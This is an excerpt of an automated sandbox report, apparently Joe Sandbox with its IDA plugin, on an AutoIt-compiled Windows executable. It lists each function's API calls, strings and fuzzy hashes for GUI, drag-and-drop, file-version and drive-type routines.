                                                      • Opcode Fuzzy Hash: ddebfd9c503d7a5d91bbb8adc61dbf71d03073aca49f2875d8bb2371e6ed2dd5
                                                      • Instruction Fuzzy Hash: 08D16E702083519BCF08EF14C455AAE7BA7AF95354F14446CF8829B3E3DB21EE0ACB95
                                                      APIs
                                                      • DestroyWindow.USER32(?,?,?), ref: 005E2CA2
                                                      • DeleteObject.GDI32(00000000), ref: 005E2CE8
                                                      • DeleteObject.GDI32(00000000), ref: 005E2CF3
                                                      • DestroyIcon.USER32(00000000,?,?,?), ref: 005E2CFE
                                                      • DestroyWindow.USER32(00000000,?,?,?), ref: 005E2D09
                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0061C43B
                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0061C474
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0061C89D
                                                        • Part of subcall function 005E1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,005E2036,?,00000000,?,?,?,?,005E16CB,00000000,?), ref: 005E1B9A
                                                      • SendMessageW.USER32(?,00001053), ref: 0061C8DA
                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0061C8F1
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0061C907
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0061C912
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                      • String ID: 0$@U=u
                                                      • API String ID: 464785882-975001249
                                                      • Opcode ID: 0846082b22dd1509a50133219871ec25c01afac30bb1016925c8b897fdf2afd6
                                                      • Instruction ID: 5a49eba288fed2fc02acb2b19d0f7e09b4607936810267b4decfdef9aa90076d
                                                      • Opcode Fuzzy Hash: 0846082b22dd1509a50133219871ec25c01afac30bb1016925c8b897fdf2afd6
                                                      • Instruction Fuzzy Hash: D5128D30644241EFDB14CF25C888BEDBBE6BF45320F584569E49ACB262C771EC92DB91
                                                      APIs
                                                      • DestroyWindow.USER32(00000000), ref: 006574DE
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0065759D
                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 006575DB
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 006575ED
                                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00657633
                                                      • GetClientRect.USER32(00000000,?), ref: 0065763F
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00657683
                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00657692
                                                      • GetStockObject.GDI32(00000011), ref: 006576A2
                                                      • SelectObject.GDI32(00000000,00000000), ref: 006576A6
                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 006576B6
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006576BF
                                                      • DeleteDC.GDI32(00000000), ref: 006576C8
                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 006576F4
                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 0065770B
                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00657746
                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0065775A
                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 0065776B
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0065779B
                                                      • GetStockObject.GDI32(00000011), ref: 006577A6
                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 006577B1
                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 006577BB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                      • String ID: @U=u$AutoIt v3$DISPLAY$msctls_progress32$static
                                                      • API String ID: 2910397461-2771358697
                                                      • Opcode ID: e0ba3f97a33fd2ed23d073bc4217c8c11ddcdc2590ff009e38f60aa384847125
                                                      • Instruction ID: 2fd27bb0abdb1bcb730bf9036b1a0a4e640f63eab12486e51f340fd2bdaa4aca
                                                      • Opcode Fuzzy Hash: e0ba3f97a33fd2ed23d073bc4217c8c11ddcdc2590ff009e38f60aa384847125
                                                      • Instruction Fuzzy Hash: BCA14171A40615BFEB14DFA4EC4AFAE7BBAEB45711F004114FA15A72E0DBB0AD00CB64
                                                      APIs
                                                      • GetSysColor.USER32(00000012), ref: 0066A903
                                                      • SetTextColor.GDI32(?,?), ref: 0066A907
                                                      • GetSysColorBrush.USER32(0000000F), ref: 0066A91D
                                                      • GetSysColor.USER32(0000000F), ref: 0066A928
                                                      • CreateSolidBrush.GDI32(?), ref: 0066A92D
                                                      • GetSysColor.USER32(00000011), ref: 0066A945
                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0066A953
                                                      • SelectObject.GDI32(?,00000000), ref: 0066A964
                                                      • SetBkColor.GDI32(?,00000000), ref: 0066A96D
                                                      • SelectObject.GDI32(?,?), ref: 0066A97A
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0066A999
                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0066A9B0
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0066A9C5
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0066A9ED
                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0066AA14
                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 0066AA32
                                                      • DrawFocusRect.USER32(?,?), ref: 0066AA3D
                                                      • GetSysColor.USER32(00000011), ref: 0066AA4B
                                                      • SetTextColor.GDI32(?,00000000), ref: 0066AA53
                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0066AA67
                                                      • SelectObject.GDI32(?,0066A5FA), ref: 0066AA7E
                                                      • DeleteObject.GDI32(?), ref: 0066AA89
                                                      • SelectObject.GDI32(?,?), ref: 0066AA8F
                                                      • DeleteObject.GDI32(?), ref: 0066AA94
                                                      • SetTextColor.GDI32(?,?), ref: 0066AA9A
                                                      • SetBkColor.GDI32(?,?), ref: 0066AAA4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                      • String ID: @U=u
                                                      • API String ID: 1996641542-2594219639
                                                      • Opcode ID: c76c2ca4b77087d30a466c29d64ba54dbf100ebb01955da13949f7d653870dd9
                                                      • Instruction ID: 0533169f8e67fbf154f74bd8e2e70cd84c5b4ed6a742bae98f39c4b9082fd4c6
                                                      • Opcode Fuzzy Hash: c76c2ca4b77087d30a466c29d64ba54dbf100ebb01955da13949f7d653870dd9
                                                      • Instruction Fuzzy Hash: 6E512F71900208EFDB119FA4EC48E9EBB7AEF49320F215625F911AB2A1D7B19D40DF90
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0064AD1E
                                                      • GetDriveTypeW.KERNEL32(?,0066FAC0,?,\\.\,0066F910), ref: 0064ADFB
                                                      • SetErrorMode.KERNEL32(00000000,0066FAC0,?,\\.\,0066F910), ref: 0064AF59
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DriveType
                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                      • API String ID: 2907320926-4222207086
                                                      • Opcode ID: 86efe88dd57a51792407497fe57d3496eeca6b2e5af18a3acb8b54e8e69cfbd6
                                                      • Instruction ID: 2c8e6065a93d2f6ecc5e50c1a3d316d6a5e30d9e98cf03b0bd4f51cfc9a7d71a
                                                      • Opcode Fuzzy Hash: 86efe88dd57a51792407497fe57d3496eeca6b2e5af18a3acb8b54e8e69cfbd6
                                                      • Instruction Fuzzy Hash: 8051B1B168824ABF8F44DF90C942CFD77A7EF497107254066E407A76D1DA329D06EB43
                                                      APIs
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00669AD2
                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00669B8B
                                                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 00669BA7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window
                                                      • String ID: 0$@U=u
                                                      • API String ID: 2326795674-975001249
                                                      • Opcode ID: 243ac1d1814db082a47eee4e6cdd432348a820468c8dc5c2ffb63a8be3d67698
                                                      • Instruction ID: faf2deda5c9e11b75616a37935fbba50f7ba76c269a2358810f2266803f6334d
                                                      • Opcode Fuzzy Hash: 243ac1d1814db082a47eee4e6cdd432348a820468c8dc5c2ffb63a8be3d67698
                                                      • Instruction Fuzzy Hash: F502BC30108201AFDB25CF24C849BAABBEAFF89714F04852DF999D62A1C775D945CF62
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                      • API String ID: 1038674560-86951937
                                                      • Opcode ID: 885d96b2b412819ff47449f3cbed6ced5d4afa2f3a5431d6bdeed916d19d05a1
                                                      • Instruction ID: 015079809cf5b3c2a46d637b06f5821cc3ddaacf02cd925fde21c78a157ea17d
                                                      • Opcode Fuzzy Hash: 885d96b2b412819ff47449f3cbed6ced5d4afa2f3a5431d6bdeed916d19d05a1
                                                      • Instruction Fuzzy Hash: 1F814DB1640246AACB18AF61DC43FEF3BAABF15780F044029FD85AB1C2EB71DD41C255
                                                      APIs
                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00668AC1
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00668AD2
                                                      • CharNextW.USER32(0000014E), ref: 00668B01
                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00668B42
                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00668B58
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00668B69
                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00668B86
                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00668BD8
                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00668BEE
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00668C1F
                                                      • _memset.LIBCMT ref: 00668C44
                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00668C8D
                                                      • _memset.LIBCMT ref: 00668CEC
                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00668D16
                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00668D6E
                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 00668E1B
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00668E3D
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00668E87
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00668EB4
                                                      • DrawMenuBar.USER32(?), ref: 00668EC3
                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00668EEB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                      • String ID: 0$@U=u
                                                      • API String ID: 1073566785-975001249
                                                      • Opcode ID: 523e4094b95e3a059726d028cc149b21d0eebe1182a3fc166c83c242b81faa4c
                                                      • Instruction ID: b270e543a21fd96573152f7b972b2dfaa6ca5b52ba7a2134ea12a499e9a85b88
                                                      • Opcode Fuzzy Hash: 523e4094b95e3a059726d028cc149b21d0eebe1182a3fc166c83c242b81faa4c
                                                      • Instruction Fuzzy Hash: 82E17271904219AFDF20DF64CC84EEE7BBAEF09750F10825AF915AB291DB709981DF60
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 006649CA
                                                      • GetDesktopWindow.USER32 ref: 006649DF
                                                      • GetWindowRect.USER32(00000000), ref: 006649E6
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00664A48
                                                      • DestroyWindow.USER32(?), ref: 00664A74
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00664A9D
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00664ABB
                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00664AE1
                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 00664AF6
                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00664B09
                                                      • IsWindowVisible.USER32(?), ref: 00664B29
                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00664B44
                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00664B58
                                                      • GetWindowRect.USER32(?,?), ref: 00664B70
                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00664B96
                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00664BB0
                                                      • CopyRect.USER32(?,?), ref: 00664BC7
                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00664C32
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                      • String ID: ($0$tooltips_class32
                                                      • API String ID: 698492251-4156429822
                                                      • Opcode ID: 18a129d6a87b1963ea31c74a298f150c4c934f74e84e56e5e88adba34f1816e1
                                                      • Instruction ID: fa97b7e738bb7eb231cec3eae312504052a1ca8cbae766c759ae8c0bfe6ad2df
                                                      • Opcode Fuzzy Hash: 18a129d6a87b1963ea31c74a298f150c4c934f74e84e56e5e88adba34f1816e1
                                                      • Instruction Fuzzy Hash: 43B19E71608341AFDB04DF65D848B6ABBE6FF84314F008A1CF5999B2A1DB71EC05CB95
                                                      APIs
                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 006444AC
                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 006444D2
                                                      • _wcscpy.LIBCMT ref: 00644500
                                                      • _wcscmp.LIBCMT ref: 0064450B
                                                      • _wcscat.LIBCMT ref: 00644521
                                                      • _wcsstr.LIBCMT ref: 0064452C
                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00644548
                                                      • _wcscat.LIBCMT ref: 00644591
                                                      • _wcscat.LIBCMT ref: 00644598
                                                      • _wcsncpy.LIBCMT ref: 006445C3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                      • API String ID: 699586101-1459072770
                                                      • Opcode ID: f43ebef1e45bd1492dd255f9020e9d3e1a31fce79d0b84fd399e7618e02d8701
                                                      • Instruction ID: 3760ee2a1d27101ae5c8daa3188dd481a10f039b2efcf1f0f2d8d9e8b11d1e7b
                                                      • Opcode Fuzzy Hash: f43ebef1e45bd1492dd255f9020e9d3e1a31fce79d0b84fd399e7618e02d8701
                                                      • Instruction Fuzzy Hash: EB41F771580205BBEB58AB74DC47FBF776EDF42710F10006EF905E61C2EE74AA0196A9
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005E28BC
                                                      • GetSystemMetrics.USER32(00000007), ref: 005E28C4
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005E28EF
                                                      • GetSystemMetrics.USER32(00000008), ref: 005E28F7
                                                      • GetSystemMetrics.USER32(00000004), ref: 005E291C
                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 005E2939
                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 005E2949
                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 005E297C
                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 005E2990
                                                      • GetClientRect.USER32(00000000,000000FF), ref: 005E29AE
                                                      • GetStockObject.GDI32(00000011), ref: 005E29CA
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 005E29D5
                                                        • Part of subcall function 005E2344: GetCursorPos.USER32(?), ref: 005E2357
                                                        • Part of subcall function 005E2344: ScreenToClient.USER32(006A57B0,?), ref: 005E2374
                                                        • Part of subcall function 005E2344: GetAsyncKeyState.USER32(00000001), ref: 005E2399
                                                        • Part of subcall function 005E2344: GetAsyncKeyState.USER32(00000002), ref: 005E23A7
                                                      • SetTimer.USER32(00000000,00000000,00000028,005E1256), ref: 005E29FC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                      • String ID: @U=u$AutoIt v3 GUI
                                                      • API String ID: 1458621304-2077007950
                                                      • Opcode ID: 471f90593c2dc1d37c99dc7027f500ae34bfafa6838406052748da3d57d2f962
                                                      • Instruction ID: d861d46b0fe759b0041be59f1e6af377add2fa8f4d73453635ff10fabbdd3976
                                                      • Opcode Fuzzy Hash: 471f90593c2dc1d37c99dc7027f500ae34bfafa6838406052748da3d57d2f962
                                                      • Instruction Fuzzy Hash: 9AB16C71A4024AEFDB14DFA9DC45BED7BBAFB48310F105129FA56E62A0DB74A840CF50
                                                      APIs
                                                        • Part of subcall function 005E2612: GetWindowLongW.USER32(?,000000EB), ref: 005E2623
                                                      • DragQueryPoint.SHELL32(?,?), ref: 0066C627
                                                        • Part of subcall function 0066AB37: ClientToScreen.USER32(?,?), ref: 0066AB60
                                                        • Part of subcall function 0066AB37: GetWindowRect.USER32(?,?), ref: 0066ABD6
                                                        • Part of subcall function 0066AB37: PtInRect.USER32(?,?,0066C014), ref: 0066ABE6
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0066C690
                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0066C69B
                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0066C6BE
                                                      • _wcscat.LIBCMT ref: 0066C6EE
                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0066C705
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0066C71E
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0066C735
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0066C757
                                                      • DragFinish.SHELL32(?), ref: 0066C75E
                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0066C851
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$@U=u$HW
                                                      • API String ID: 169749273-207159503
                                                      • Opcode ID: 8505687679b4bec32055775b5988727c1570e2da31544188279994950344ad82
                                                      • Instruction ID: 0cde86422c95494699c6d9bd4f3bf47133348cd29df7bdd1f02475fd8d487156
                                                      • Opcode Fuzzy Hash: 8505687679b4bec32055775b5988727c1570e2da31544188279994950344ad82
                                                      • Instruction Fuzzy Hash: 6E616B71108341AFC705EF65DC89DAFBBEAFF89750F00092EF5A5921A1DB709909CB52
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0066BA56
                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0066BA6D
                                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0066BA78
                                                      • CloseHandle.KERNEL32(00000000), ref: 0066BA85
                                                      • GlobalLock.KERNEL32(00000000), ref: 0066BA8E
